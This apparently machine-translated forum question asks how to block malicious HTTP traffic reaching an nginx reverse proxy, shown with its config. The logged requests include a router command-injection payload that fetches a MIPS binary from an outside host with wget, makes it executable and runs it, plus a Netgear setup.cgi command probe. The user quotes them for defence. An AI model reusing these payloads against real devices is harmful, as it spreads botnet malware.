过滤nginx上的垃圾邮件HTTP流量

我有一个web服务器，它托管我的开放式互联网web应用程序。每个web应用程序都有自己的子域，例如app1.mycompanydomain.com和app2.mycompanyddomain.com.所有传入流量都会到达nginx，在那里它解析主机名并将请求代理到同一VM上的应用程序web服务器。这是我的配置：

server {
listen 80;
server_name _;
return 444;
}
server {
listen 80;
server_name *.mycompanydomain.com;
return 301 https://$host$request_uri;
}
server {
listen 443 ssl;
server_name _;
ssl_certificate /opt/cert/cert.crt;
ssl_certificate_key /opt/cert/cert.key;
return 444;
}
server {
server_name app1.mycompanydomain.com app1.mycompanydomain.com;
listen 443 ssl;
ssl_certificate /opt/cert/cert.crt;
ssl_certificate_key /opt/cert/cert.key;
location / {
proxy_pass http://localhost:9081/;
}
}
#Proxying for the rest of the applications look the same

我返回444 http状态的块旨在过滤掉我们过去经常收到的自动恶意请求。问题是，我们仍然收到相当数量的此类请求。我几乎可以肯定，这些请求中的大多数是由不知道目标主机的自动机器人发送的，但由于某种原因，我们无法识别这些请求的目标主机，因此我们无法真正阻止它们。我们试图记录$host、$http_host、$server_name，但它们都是空的或_。

因此2个问题：

1. 请求主机怎么可能是空的？是否有其他方法来识别请求主机
2. 我还可以实施哪些规则来过滤我们的恶意流量

仍在通过的恶意流量示例：

1。IP:45.222.213.31[2020年2月28日0:03:32:25-0500]请求："GET/login.cgi？cli=aa%20A%27；wget%20http://45.148.10.194/mips%20-O%20->%20/tmp/lenn；chmod%20777%20/tmp/利昂/tmp/lionn%20dlink.mips%27$HTTP/1.1"，目标：_，代码：400，正文：166，代理："僵尸网络/2.0"，时间：0.000ms

2.IP:85.93.20170[27/20220:16:29:24-0500]请求："\x03\x00\x00/\xE0\x00\x00\x0\x00\x00Cookie:mtshash=Administr"，目标：_，代码：400，正文：166，代理："-"，时间：0.132ms

3.IP:31.208.166.61[2520:25:16:07:02-0500]请求："GET/setup.cgi？next_file=netgear.cfg&todo=syscmd&cmd=busybox&curpath=/&currentsetting.htm=1 HTTP/1.1"，目标：_，代码：400，正文：166，代理："Mozilla/5.0"，时间：0.000毫秒